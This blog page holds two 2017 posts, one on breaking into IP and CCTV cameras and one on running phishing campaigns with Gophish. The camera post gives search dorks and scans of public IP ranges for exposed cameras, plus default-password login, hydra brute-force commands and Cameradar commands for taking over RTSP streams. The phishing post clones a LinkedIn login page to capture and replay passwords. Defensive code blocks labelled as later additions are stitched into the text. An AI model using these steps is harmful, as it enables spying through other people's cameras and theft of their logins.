Friday, June 16, 2017

Exploiting CCTV and IP Cameras

Surveillance cameras have helped launch some of the biggest attacks on the Internet. The Internet of Things (IoT) is now a major force in the weaponization of DDoS, and cameras are among the devices recruited into botnets to fuel those attacks. This article shows how they can be compromised and exploited by attackers using various techniques.

"Surveillance cameras" is a group term that covers both CCTV and IP cameras. There are some major differences between Closed Circuit Television (CCTV) systems and Internet Protocol (IP) cameras. IP cameras are the modern choice, though business owners and property managers still prefer CCTV cameras to monitor large spaces. Below is a brief comparison of the main features of each type of camera.

CCTV cameras | IP cameras
--- | ---
Send video back through coaxial or UTP cables. | Broadcast video as a digital stream over an IP network to an NVR (network video recorder).
Video is recorded on a physical DVR, which can be connected to the internet for remote viewing. | Use SD cards to record locally, or send video via the internet to an NVR.
Power and network cables run between each camera and the base station. | Use PoE (Power over Ethernet), making it unnecessary to run power cables.
Because cabling is required, CCTV cameras all have to be in one location. | Because cabling is not always required, IP cameras do not all need to be kept in one location.
Cameras typically offer a lower resolution of 960 x 480, but some systems offer HD resolution. | Some cameras feature increased resolution of 4096 x 2160. Standard resolution tends to be 1080p HD.
Primarily provide video surveillance without advanced features. | Include advanced features such as analytics, advanced motion detection and remote focus.
There is a physical limit to the number of cameras that can be added to the network. | Unlimited cameras can be added to the network.
2-way audio for communication with people on the other end. | 2-way audio for communication with people on the other end.
Use television to broadcast signals. | Use Wi-Fi and bandwidth.

In this article we concentrate on IP cameras, since they are the most widely used and they communicate directly between the computer network and the internet, so the live feed can be accessed from anywhere using any device.

Google Dorks
Google dorks are Google Search queries that find vulnerable systems or sensitive information about databases, websites or any IoT device.
The following types of queries can be used to find vulnerable security cameras on the internet:
inurl:"CgiStart?page="
inurl:/view.shtml
intitle:"Live View / - AXIS"
inurl:view/view.shtml
inurl:ViewerFrame?Mode=
inurl:ViewerFrame?Mode=Refresh
inurl:axis-cgi/jpg
inurl:axis-cgi/mjpg (motion-JPEG) (disconnected)
inurl:view/indexFrame.shtml
inurl:view/index.shtml
liveapplet
intitle:"live view" intitle:axis
intitle:liveapplet
allintitle:"Network Camera NetworkCamera" (disconnected)
intitle:axis intitle:"video server"
intitle:liveapplet inurl:LvAppl
intitle:"EvoCam" inurl:"webcam.html"
intitle:"Live NetSnap Cam-Server feed"
inurl:indexFrame.shtml Axis


Shodan
Shodan is also a great search engine that lets one find specific types of computers, or anything imaginable that is connected to the internet, in this case IP cameras. Using filters you can get a list of exploitable IP cameras.

Angry IP Scanner
Angry IP Scanner, also known as ipscan, is an open source network scanning tool that can be used to scan IP addresses and ports on your network. It works by simply inputting a network range to scan. For first time use, make sure you add the Web detect fetcher by going to Tools > Fetchers.
On an internal network it is easy to input the network range: start with your default gateway's network address and end with the last address in the range. When the scan is complete it shows the IP address assigned to the IP camera. The IP camera may also be configured to sit outside the network.
myip.ms is an online IP database; it is good for finding the public IPv4 network ranges of any country or province. Since you will not get the exact IP address of the camera, you have to input a network range to scan, preferably the whole last octet of the subnet (0-255).
After a successful scan, note the names of the cameras in the Web detect column.

The following are the keywords to look out for in the Web detect column; they identify IP cameras:
RomPager/4.07 UPnP/1.0
uc-httpd 1.0.0
DVRDVS-Webs
Microhttpd
Webs
Hikvision-Webs
iBall-Baton


Pasting the IP address into your web browser, you will be presented with a web login page. There are different IP camera models on the market, and this article also tries to point out how poor their security is and how easily it can be exploited.
You should first try logging in with default passwords. System administrators leave their devices with default username and password combinations for a variety of reasons: simply not knowing that the password needs to be changed, or assuming that their perimeter firewall will protect them from unauthorized access, which is a stupid idea. During the attack phase, attackers spend most of their time going through product specifications and configurations to find any way into a device or system.
Different camera models have different default logins; google them for your case. Some IP cameras, like the Avigilon and newer Axis models, require password creation at first login, which is good practice; other vendors such as Hikvision, Panasonic, Northern, Samsung and Bosch have adopted the same by upgrading their firmware to require creation of a unique password.
After a successful login some cameras need plugins to work in the web page; you can download them from the same page or from the manufacturer's website.

Non-default credentials do not keep attackers away either, since passwords can be cracked. Poor password choice is exploited at this point: the simpler the password, the easier it is to crack.
Hydra is a powerful tool that can be used to crack IP/CCTV camera passwords, or those of other password-protected applications. You will need a wordlist, which can be found by default in the Kali Linux distro, or you can create a custom one yourself.

hydra -s 80 -l admin -P /path/to/your/wordlist.txt -e ns -t 16 targetIP http
The arguments of the above hydra command are explained below:
-s 80 -- port number
-l admin -- the default login name 'admin'
-P -- path to your wordlist
-e ns -- additional checks: n tries an empty password, s tries the login name as the password
-t 16 -- number of parallel connections
http -- the service (protocol module) to attack
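As an added defensive counterpart to the password attack above (example code, not from the original post): the logic a log monitor would run over a camera's HTTP access log to flag a source address that piles up 401 responses. The log lines are constructed, and the threshold and window are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample lines in combined log format; not taken from any real device.
_LINE = '{ip} - - [16/Jun/2017:10:00:{sec:02d} +0000] "GET /login.htm HTTP/1.1" {status} 0 "-" "Mozilla/5.0"'
SAMPLE_LOG = (
    [_LINE.format(ip="10.0.0.5", sec=s, status=401) for s in range(0, 36, 3)]  # 12 failures in 33 s
    + [_LINE.format(ip="10.0.0.9", sec=5, status=401),                          # one mistyped password,
       _LINE.format(ip="10.0.0.9", sec=9, status=200)]                          # then a normal login
)

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "[^"]*" (?P<status>\d{3})')


def parse_line(line):
    """Return (source_ip, timestamp, status) or None for lines that do not match."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("ip"), ts, int(m.group("status"))


def detect_bruteforce(lines, threshold=10, window=timedelta(seconds=60)):
    """Map each source IP that produced `threshold` or more 401 responses inside a sliding
    `window` (assumed values) to the timestamp at which it crossed the threshold."""
    recent = defaultdict(deque)   # per-IP timestamps of recent failed logins
    alerts = {}
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, ts, status = parsed
        if status != 401:          # only failed authentications count
            continue
        failures = recent[ip]
        failures.append(ts)
        while failures and ts - failures[0] > window:   # drop failures that fell out of the window
            failures.popleft()
        if len(failures) >= threshold and ip not in alerts:
            alerts[ip] = ts
    return alerts


if __name__ == "__main__":
    for ip, when in detect_bruteforce(SAMPLE_LOG).items():
        print(f"possible password brute force from {ip} at {when:%H:%M:%S}")
```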

Most commercial IP cameras use RTSP as the mechanism for streaming their video feeds. Real Time Streaming Protocol (RTSP) is a network control protocol designed for use in entertainment and communications systems to control streaming media servers. The protocol is used for establishing and controlling media sessions between end points. Clients of media servers issue VCR-style commands, such as play, record and pause, to control in real time the media streamed from the server to the client.
RTSP, just like HTTP, runs on specific ports: 554 (the default RTSP port) and 8554 (the default emulated RTSP port). RTSP has its own structure and control commands, but its format is textual, so it is easy to use once you have learned the basic commands behind it.
RTSP gets little limelight, but not among security professionals, since it is exploitable. There is a tool, Cameradar, that hacks its way into RTSP CCTV cameras. It is available on GitHub and has the following cool features:
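As an added illustration of the textual RTSP exchange described above (constructed example, not from the original post or from Cameradar): the DESCRIBE request a client sends, and a small parser that grades the camera's reply the way a defender auditing their own cameras would. The hostname, route and nonce are made up.

```python
# Constructed RTSP messages for illustration; not captures from a real camera.
DESCRIBE_REQUEST = (
    "DESCRIBE rtsp://camera.example:554/live.sdp RTSP/1.0\r\n"
    "CSeq: 2\r\nAccept: application/sdp\r\n\r\n"
)
SAMPLE_RESPONSES = {
    "open":   "RTSP/1.0 200 OK\r\nCSeq: 2\r\nContent-Type: application/sdp\r\nContent-Length: 0\r\n\r\n",
    "basic":  "RTSP/1.0 401 Unauthorized\r\nCSeq: 2\r\nWWW-Authenticate: Basic realm=\"camera\"\r\n\r\n",
    "digest": ("RTSP/1.0 401 Unauthorized\r\nCSeq: 2\r\n"
               "WWW-Authenticate: Digest realm=\"camera\", nonce=\"1a2b3c\"\r\n\r\n"),
}


def build_describe(url, cseq):
    """Build the DESCRIBE request a client sends to ask for the stream's SDP description."""
    return f"DESCRIBE {url} RTSP/1.0\r\nCSeq: {cseq}\r\nAccept: application/sdp\r\n\r\n"


def parse_response(raw):
    """Split an RTSP response into (status_code, {header_name: [values]}); headers may repeat."""
    head, _, _body = raw.partition("\r\n\r\n")
    status_line, *header_lines = head.split("\r\n")
    _version, code, _reason = status_line.split(" ", 2)
    headers = {}
    for h in header_lines:
        name, _, value = h.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return int(code), headers


def classify_describe_response(raw):
    """Grade what a DESCRIBE reply tells a defender about how the stream is protected."""
    code, headers = parse_response(raw)
    if code == 200:
        return "open"        # SDP handed out with no credentials: anyone reaching port 554 can watch
    if code == 401:
        schemes = {v.split(" ", 1)[0].lower() for v in headers.get("www-authenticate", [])}
        if "basic" in schemes:
            return "basic"   # password protected, but the password crosses the wire base64-encoded
        if "digest" in schemes:
            return "digest"  # challenge-response: the password itself is never sent
    return "other"


if __name__ == "__main__":
    for label, reply in SAMPLE_RESPONSES.items():
        print(f"{label:7s} -> {classify_describe_response(reply)}")
```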
  • Detects open RTSP hosts on any accessible subnetwork.
  • Gets the public info (hostname, port, camera model).
  • Brute forces its way into them to get their stream route.
  • Brute forces its way into them to get the username and password of the cameras.
  • Generates thumbnails from them to check that the streams are valid.
  • Creates a GStreamer pipeline to check that they are properly encoded.
  • Prints a summary of all the information.


Cameradar uses Docker, an application that automates the deployment of applications inside software containers.
Before you run the tool, install the dependencies with your Linux distribution's package manager (Arch Linux shown here):
sudo pacman -S docker

Start the docker service:
sudo systemctl start docker
Install the tool by git cloning it from Github then build it.
git clone https://github.com/EtixLabs/cameradar.git
cd cameradar/deployment
sudo rm *.tar.gz
sudo ./build_last_package.sh
docker-compose build cameradar
docker-compose up cameradar

Run Cameradar from the terminal:
sudo docker run \
-v /tmp/thumbs:/tmp/thumbs \
-e CAMERAS_PORTS=your_ports \
-e CAMERAS_SUBNETWORKS=your_subnetwork \
ullaakut/cameradar:tag

The arguments of the above command are explained below:
/tmp/thumbs - path where the thumbnails are saved
CAMERAS_SUBNETWORKS - a subnet (e.g. 172.16.100.0/24) or even a single IP (e.g. 172.16.100.10)
CAMERAS_PORTS - a port, multiple ports or even port ranges (e.g. 554,8554,9000-9554)
tag - allows you to specify a particular version of Cameradar

After a successful scan and brute force, the generated thumbnails will be in /tmp/thumbs both on your machine and in the container. The results are output as JSON objects like:
{
  "address" : "127.0.0.1",
  "ids_found" : true,
  "password" : "123456",
  "path_found" : true,
  "port" : 554,
  "product" : "Vivotek FD9381-HTV",
  "protocol" : "tcp",
  "route" : "/live.sdp",
  "service_name" : "rtsp",
  "state" : "open",
  "thumbnail_path" : "/tmp/thumbs/127.0.0.1/1234567.jpg",
  "username" : "admin"
}


VLC Media Player can be used to view the RTSP live stream from the Media > Stream > Network option, using a URL in this format:
rtsp://username:password@address:port/route

Wednesday, June 7, 2017

Phishing with Gophish+Mail-in-a-box (MIAB)

Phishing is often the first phase of an attack after reconnaissance, mainly because it works well: it relies on psychological manipulation of the human mind. To counter this, the 'Phishing as a Service' routine has been introduced, which uses tools that create fully automated campaigns. Employees are trained on how to spot phishing emails and are then tested with mock phishing emails. The percentage who fall victim decreases with each round, though it is impossible to reach a zero response rate. This article shows how to configure Gophish, one of the phishing simulators out there, with Mail-in-a-Box, a dedicated Linux mail server.

Gophish is a simple phishing toolkit that allows easy management of phishing campaigns. It handles the malicious web pages that you create, the email templates and the SMTP configs. It is available for all OS types.
MIAB is an easy-to-deploy mail server in a box. It helps individuals take back control of their email by defining a one-click, easy-to-deploy SMTP-plus-everything-else server: a mail server in a Linux box. Both applications are hosted on a VPS; this post concentrates mostly on Gophish and on how to configure the two to run on one Linux box to save on hosting costs. For a complete, detailed guide on how to set up MIAB go to https://mailinabox.email/guide.html, or for a video set-up guide head to this YouTube video: https://youtu.be/9WOmkoEYMIg

Installing Gophish

This takes place on the MIAB Linux server. Assuming you have already set up MIAB and it is running, download the latest version of Gophish:
wget https://github.com/gophish/gophish/releases/download/v0.3.0/gophish-v0.3-linux-64bit.zip

Once that is downloaded unzip the folder:
unzip gophish-v0.3-linux-64bit.zip -d Gophish

Change directory into that folder and make the gophish binary executable:
cd Gophish
chmod +x gophish


Open the config.json file and edit the listen_urls, paths to TLS certificates and keys:
vim config.json

MIAB uses TLS certificates provisioned by Let's Encrypt for your domains. You are going to reuse those certificates and keys in your Gophish application; they live under /home/user-data/ssl/. Next change each listen_url to 0.0.0.0, which makes Gophish listen on all interfaces. After the edits the config.json file should look something like this:
{
  "admin_server" : {
    "listen_url" : "0.0.0.0:3333",
    "use_tls" : true,
    "cert_path" : "/home/user-data/ssl/ssl_certificate.pem",
    "key_path" : "/home/user-data/ssl/ssl_private_key.pem"
  },

  "phish_server" : {
    "listen_url" : "0.0.0.0:80",
    "use_tls" : true,
    "cert_path" : "/home/user-data/ssl/ssl_certificate.pem",
    "key_path" : "/home/user-data/ssl/ssl_private_key.pem"
  },

  "db_name" : "sqlite3",
  "db_path" : "gophish.db",
  "migrations_prefix" : "db/db_"
}
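As an added check (example code, not part of Gophish or of the original post): a small audit of the config.json above that flags the two settings a practitioner would want to revisit before exposing the box, the admin interface bound to every interface, and use_tls on a port that http:// links will reach in plain text. The config text is embedded so the check runs offline, and the `exists` callback is injectable so it can run where the certificate files are absent.

```python
import json
import os

# The config.json from the post, embedded so the check runs offline (paths are the post's).
SAMPLE_CONFIG = """
{
  "admin_server": {"listen_url": "0.0.0.0:3333", "use_tls": true,
                   "cert_path": "/home/user-data/ssl/ssl_certificate.pem",
                   "key_path": "/home/user-data/ssl/ssl_private_key.pem"},
  "phish_server": {"listen_url": "0.0.0.0:80", "use_tls": true,
                   "cert_path": "/home/user-data/ssl/ssl_certificate.pem",
                   "key_path": "/home/user-data/ssl/ssl_private_key.pem"},
  "db_name": "sqlite3", "db_path": "gophish.db", "migrations_prefix": "db/db_"
}
"""


def check_listener(name, server, exists=os.path.exists):
    """Return a list of findings for one listener block ("admin_server" or "phish_server")."""
    findings = []
    host, _, port = server.get("listen_url", "").rpartition(":")
    if name == "admin_server" and host in ("0.0.0.0", ""):   # "" means all interfaces too
        findings.append("admin_server is reachable on every interface; bind it to 127.0.0.1 "
                        "and reach it through an SSH tunnel")
    if server.get("use_tls"):
        for key in ("cert_path", "key_path"):
            if not exists(server.get(key, "")):
                findings.append(f"{name}: {key} {server.get(key)!r} does not exist")
        if port == "80":
            findings.append(f"{name}: use_tls on port 80, but http://host/ links make browsers "
                            "speak plain HTTP to that port, so the TLS handshake never happens")
    elif host in ("0.0.0.0", ""):
        findings.append(f"{name}: TLS is disabled on a listener exposed to the network")
    return findings


def audit_config(text, exists=os.path.exists):
    """Audit a Gophish config.json given as text; returns the list of findings (empty = clean)."""
    cfg = json.loads(text)
    findings = []
    for name in ("admin_server", "phish_server"):
        findings.extend(check_listener(name, cfg.get(name, {}), exists))
    return findings


if __name__ == "__main__":
    for finding in audit_config(SAMPLE_CONFIG):
        print("finding:", finding)
```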

You can change the admin server port to your liking, but the phish server's must be 80, since it serves the URL that points to the cloned malicious web pages and port 80 is the well-known port for HTTP servers. This, however, leads to errors because MIAB's Nginx web server uses the same port, so you have to stop Nginx:
service nginx stop

You can use netstat to confirm which services are listening on which ports:
netstat -tulpn

NOTE that you will not be able to access your webmail while Nginx is stopped, which is why you must ensure MIAB is running before you configure Gophish. Remember the end goal is phishing while minimizing VPS hosting costs, since MIAB was designed to run alone on a fresh, dedicated machine.

Now you can go ahead and start Gophish:
./gophish

Gophish should now be running, and in the terminal where you started it you should see that two servers have been created: the admin interface, which lets you manage your phishing campaigns, and the phishing server, which serves the malicious clones.

Proceed to your browser and log in with the credentials admin:gophish. You can change these from the settings tab. After you have logged in you are presented with the dashboard. From here navigate to the Sending Profiles tab on the left-hand side of the site and click New Profile. Fill out the form with the mail details from MIAB: your email address, SMTP details and password. Click Send Test Email to ensure the details have been entered correctly.

You can then move on to the Landing Page. This is where the victim will be directed after clicking a link in the email message. Just like before, click New Page and enter the required details in the form. Choose a Page Name that you can remember later on; I recommend using the same name as the website you are going to clone. Then import the site you want to clone by clicking Import Site and entering the legitimate web URL in the popup that appears. Once that is done, select Capture Submitted Data and Capture Passwords. You can then add a Redirect, i.e. the actual page the victim will be redirected to; in this case the LinkedIn login page. Note that some cloned sites may not work when you run a campaign because of JavaScript code; you will have to go through the code manually and delete what is not needed. The "POST" form action is the important part of the code.

Moving on to Email Templates, you again name the template with the name you used for the landing page. You can then import an email template: in Gmail you can view the email source and copy it into the Email Content field in Gophish. You then have to change the links to point to the Landing Page, so that any link in the email automatically sends the recipient to the cloned phishing page. You can then save the template.


You then add Users and Groups, giving the group a Group Name. This is where the target email addresses are stored. Add each person's first and last name, email and position and add them to the list. You can also bulk import users into the group.

The last step is launching a campaign. You need to enter all the information from the previous steps, name the campaign and add the URL of the site that will capture the data; in this case the domain you bought and set up with MIAB. You can then schedule when you want the email to be sent. Also be sure to check the time zone of the VPS you are using so that it matches yours before you launch the campaign.



You can now see the active campaign in your dashboard as you wait for the email to be received. Within the dashboard you can also see a timeline of the campaign: when the campaign was created, when the email was sent and opened, whether the link was clicked and whether any data was submitted. The submitted data lets you see what was entered. You can also replay the credentials, which automatically logs in to that site with them.


References
https://getgophish.com/documentation/
https://github.com/gophish/gophish/releases
https://mailinabox.email/
https://www.skyhighnetworks.com/cloud-security-blog/top-phishing-test-tools-and-simulators/
